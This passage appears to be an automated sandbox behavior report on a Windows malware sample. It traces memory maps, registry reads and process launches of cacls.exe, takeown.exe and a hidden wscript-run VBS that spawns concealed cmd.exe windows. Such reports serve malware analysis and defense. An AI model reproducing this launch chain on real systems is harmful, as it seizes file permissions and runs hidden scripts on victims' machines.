|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005030000 | 0x05030000 | 0x0503ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05040000 | 0x05376fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e870000 | 0x7e870000 | 0x7e96ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e970000 | 0x7e970000 | 0x7e992fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e997000 | 0x7e997000 | 0x7e999fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e99a000 | 0x7e99a000 | 0x7e99afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e99b000 | 0x7e99b000 | 0x7e99bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e99d000 | 0x7e99d000 | 0x7e99ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 124 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 103 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xfd4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x300, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x35c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Workflow.VisualBasic.Targets" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Workflow.VisualBasic.Targets" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #13: wscript.exe
30
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\wscript.exe |
| Command Line | wscript //B //Nologo "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\9DndEMsj.vbs" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:37, Reason: Child Process |
| Unmonitor | End Time: 00:02:51, Reason: Self Terminated |
| Monitor Duration | 00:01:14 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcc0 |
| Parent PID | 0xc94 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CC4
0x
DBC
0x
16C
0x
A1C
0x
988
0x
A98
0x
854
0x
A88
0x
7DC
0x
FBC
0x
6BC
0x
244
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000020000 | 0x00020000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00033fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000040000 | 0x00040000 | 0x00041fff | Private Memory | rw |
|
|
|
- |
| wscript.exe.mui | 0x00040000 | 0x00042fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00063fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001e0000 | 0x0029dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| wscript.exe | 0x00520000 | 0x00530fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x00540fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00550fff | Pagefile Backed Memory | r |
|
|
|
- |
| 9dndemsj.vbs | 0x00560000 | 0x00560fff | Memory Mapped File | r |
|
|
|
|
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00707fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000710000 | 0x00710000 | 0x00890fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x00997fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009a0000 | 0x009a0000 | 0x009a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x009b3fff | Private Memory | rw |
|
|
|
- |
| wshom.ocx | 0x009c0000 | 0x009ccfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x009dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x009e0000 | 0x00d16fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d20000 | 0x00d20000 | 0x00e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e20000 | 0x00e20000 | 0x00e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x00f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fa0000 | 0x00fa0000 | 0x0109ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010a0000 | 0x010a0000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010e0000 | 0x010e0000 | 0x011dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x0121ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001220000 | 0x01220000 | 0x01220fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001230000 | 0x01230000 | 0x0123ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x01230000 | 0x01233fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x0133ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001340000 | 0x01340000 | 0x0137ffff | Private Memory | rw |
|
|
|
- |
| wscript.exe | 0x01380000 | 0x013a7fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000013b0000 | 0x013b0000 | 0x053affff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00000000053b0000 | 0x053b0000 | 0x067affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000067b0000 | 0x067b0000 | 0x068affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000068b0000 | 0x068b0000 | 0x068effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000068f0000 | 0x068f0000 | 0x069effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000069f0000 | 0x069f0000 | 0x06a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006a30000 | 0x06a30000 | 0x06b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006b30000 | 0x06b30000 | 0x06b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006b70000 | 0x06b70000 | 0x06c6ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x06c70000 | 0x06c73fff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db | 0x06c80000 | 0x06cc2fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x06cd0000 | 0x06cd3fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x06ce0000 | 0x06d6afff | Memory Mapped File | r |
|
|
|
- |
| propsys.dll.mui | 0x06d70000 | 0x06d80fff | Memory Mapped File | r |
|
|
|
- |
| cversions.1.db | 0x06d90000 | 0x06d93fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000006d90000 | 0x06d90000 | 0x06d90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x06da0000 | 0x06db2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000006dc0000 | 0x06dc0000 | 0x06dc0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x73e30000 | 0x740f0fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x74100000 | 0x7425ffff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x74290000 | 0x74496fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x744a0000 | 0x745e1fff | Memory Mapped File | rwx |
|
|
|
- |
| scrrun.dll | 0x745f0000 | 0x7461afff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x74620000 | 0x74636fff | Memory Mapped File | rwx |
|
|
|
- |
| scrobj.dll | 0x74640000 | 0x74674fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74680000 | 0x74711fff | Memory Mapped File | rwx |
|
|
|
- |
| wshext.dll | 0x74720000 | 0x74736fff | Memory Mapped File | rwx |
|
|
|
- |
| wshom.ocx | 0x74740000 | 0x74762fff | Memory Mapped File | rwx |
|
|
|
- |
| mpoav.dll | 0x74770000 | 0x74785fff | Memory Mapped File | rwx |
|
|
|
- |
| amsi.dll | 0x74790000 | 0x7479cfff | Memory Mapped File | rwx |
|
|
|
- |
| vbscript.dll | 0x747a0000 | 0x7481efff | Memory Mapped File | rwx |
|
|
|
- |
| msisip.dll | 0x74830000 | 0x74839fff | Memory Mapped File | rwx |
|
|
|
- |
| wldp.dll | 0x74840000 | 0x7484cfff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x74850000 | 0x748cffff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74900000 | 0x7492efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74930000 | 0x74942fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74b70000 | 0x74b8afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75220000 | 0x75255fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76820000 | 0x768a1fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x768b0000 | 0x76999fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76c90000 | 0x76d21fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x76d30000 | 0x76d3dfff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x76d40000 | 0x76d81fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| coml2.dll | 0x772e0000 | 0x77337fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x77ab0000 | 0x77c24fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007e7b8000 | 0x7e7b8000 | 0x7e7bafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7bb000 | 0x7e7bb000 | 0x7e7bdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7be000 | 0x7e7be000 | 0x7e7c0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7c1000 | 0x7e7c1000 | 0x7e7c3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7c4000 | 0x7e7c4000 | 0x7e7c6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7c7000 | 0x7e7c7000 | 0x7e7c9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7ca000 | 0x7e7ca000 | 0x7e7ccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7cd000 | 0x7e7cd000 | 0x7e7cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007e7d0000 | 0x7e7d0000 | 0x7e8cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e8d0000 | 0x7e8d0000 | 0x7e8f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e8f5000 | 0x7e8f5000 | 0x7e8f7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8f8000 | 0x7e8f8000 | 0x7e8f8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8f9000 | 0x7e8f9000 | 0x7e8fbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8fc000 | 0x7e8fc000 | 0x7e8fefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8ff000 | 0x7e8ff000 | 0x7e8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | Wscript.Shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = size |
|
1 | |
| Read | - | size = 267, size_out = 267 |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd.exe | show_window = SW_HIDE |
|
2 |
Module (14)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | amsi.dll | base_address = 0x74790000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75430000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernelbase.dll | base_address = 0x74e70000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wscript.exe | base_address = 0x1380000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\wscript.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryProtectedPolicy, address_out = 0x74f39ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiInitialize, address_out = 0x74793d40 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiScanString, address_out = 0x747940e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = ResolveDelayLoadedAPI, address_out = 0x74f24e60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = ResolveDelayLoadsFromDll, address_out = 0x74fa0770 |
|
1 | |
| Get Address | c:\windows\syswow64\wscript.exe | function = 1, address_out = 0x138b650 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x755c4cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiUninitialize, address_out = 0x74793f20 |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
